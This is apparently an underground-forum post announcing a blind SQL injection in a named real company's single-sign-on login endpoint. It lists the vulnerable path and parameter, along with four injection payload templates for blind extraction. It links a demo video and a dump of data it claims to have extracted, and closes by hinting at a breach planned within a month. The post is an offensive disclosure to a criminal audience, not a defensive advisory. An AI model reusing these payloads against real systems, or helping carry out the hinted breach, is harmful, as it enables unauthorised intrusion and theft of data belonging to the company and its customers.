[l33tfg]

Hello darkforums community, today I have found a SQL injection inside a backend login portal for YUM brands, for those who don't know, YUM brands owns 4 massive fast food chains: KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill, and also runs the entire backend management for all four, which is why if you find login admin endpoints for any of these companies it redirects to Yum brands


The vulnerability is in: https://iam.yum.com/selfservice/ssologin...m.yum.com/

more specifically its vulnerable to both a Blind bit and Blind Bin SQLI

I have tested this around 6-7 times and all times I was able to extract binary bits from the website

Here's an example:  files.catbox.moe/n3ehzi.mp4

Raw dump of data I extracted from the website: pastebin.com/raw/qwqVaK8d



### Strategy: Blind bin
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=2000010211'or(<query>)--+-op2a
Header: Content-Type: text/plain

### Strategy: Blind bit
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=2000010211'or(<query>)--+-9UDR
Header: Content-Type: text/plain

### Strategy: Blind bin
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=https://iam.yum.com/or(<query>)--+-lWnU
Header: Content-Type: text/plain

### Strategy: Blind bit
Method: GET
Path: /selfservice/ssologin
Query: redirect_url=https://iam.yum.com/or(<query>)--+-wzBI
Header: Content-Type: text/plain

if someone gained access to this company, they would have massive amounts of data from 5 major companies

Which may be coming soon within the next month ;)


(BTW, mods if you see this attempted to be uploaded more than once, my bad, the forum went down as I tried to do it the first time, so I'm trying again just to make sure)